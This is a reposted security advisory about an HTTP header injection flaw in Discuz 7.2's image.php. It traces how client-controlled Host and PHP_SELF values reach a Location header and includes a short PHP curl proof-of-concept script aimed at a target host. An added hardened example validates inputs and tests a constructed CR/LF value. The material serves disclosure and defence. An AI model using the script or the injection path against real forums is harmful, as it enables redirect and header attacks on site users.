dz7.2 HTTP header injection vulnerability 20107/7/

admin, April 3, 2021, 19:40:40

dz7.2 HTTP header injection vulnerability 20107/7/.

image.php:

The sink, followed (indented) by the assignments that feed each variable:

header('location: '.$boardurl.$thumbfile);
    $boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
        $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
    $thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
        $aid = intval($_GET['aid']);
        $w = intval($w);
            list($w, $h) = explode('x', $_GET['size']);
        $h = intval($h);
            list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

POC:

#!/usr/bin/php -f
<?php
# image.php curl exploit
# bincker/2010/7/7/ t00ls.net
#
# $_SERVER parameter:
# You can taint $_SERVER['PHP_SELF'] by editing the target URL.

//
// HTTP SERVER,
//

$target = $argv[1]; 
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php"); 
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); 
curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); 
$buf = curl_exec ($ch); 
curl_close($ch); 
unset($ch); 
 
echo $buf; 
 
?> 
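
A hardened form of the redirect traced above, as an added example that is not the dz7.2 code or part of the original post: the base URL comes from configuration instead of `$_SERVER['HTTP_HOST']` and `$_SERVER['PHP_SELF']`, and control characters are rejected before the value reaches `header()`. `BOARD_URL`, `assert_header_safe()` and `thumb_location()` are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not the forum's own code. All names below are hypothetical.
declare(strict_types=1);

// Assumption: the canonical site URL is set in configuration, never derived
// from $_SERVER['HTTP_HOST'] or $_SERVER['PHP_SELF'], which the client controls.
const BOARD_URL = 'https://forum.example.test/';

/** Refuse any value that could terminate or split the header line. */
function assert_header_safe(string $value): string
{
    // htmlspecialchars() leaves CR, LF and NUL untouched, so check explicitly.
    if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
        throw new InvalidArgumentException('control character in header value');
    }
    return $value;
}

/** Build the thumbnail redirect target from strictly validated integers. */
function thumb_location(string $aid, string $size): string
{
    // \z instead of $ so that a trailing newline does not pass validation.
    if (!preg_match('/^\d{1,10}\z/', $aid)
        || !preg_match('/^(\d{1,4})x(\d{1,4})\z/', $size, $m)) {
        throw new InvalidArgumentException('bad aid or size');
    }
    $thumbfile = sprintf('forumdata/imagecaches/%d_%d_%d.jpg', $aid, $m[1], $m[2]);
    return assert_header_safe(BOARD_URL . $thumbfile);
}

// Constructed inputs: a normal request, then a PHP_SELF-style value with CR/LF.
echo thumb_location('12', '100x80'), "\n";
try {
    assert_header_safe("/image.php/a\r\nb");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
// In the handler, cast the request values to string first, then:
// header('Location: ' . thumb_location($aid, $size));
```

PHP 5.1.2 and later also refuse to send a header value containing a newline, but that does not stop a client-supplied `Host` header from choosing the redirect destination, which is why the base URL is fixed in configuration here.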

Article source: lcx.cc: dz7.2 HTTP header injection vulnerability 20107/7/

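  • Published by admin on April 3, 2021, 19:40:40
  • When reposting, please keep the link to this article (CN-SEC Chinese site: thanks to the original author for the hard work):
    dz7.2 HTTP header injection vulnerability 20107/7/ http://cn-sec.com/archives/324331.html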
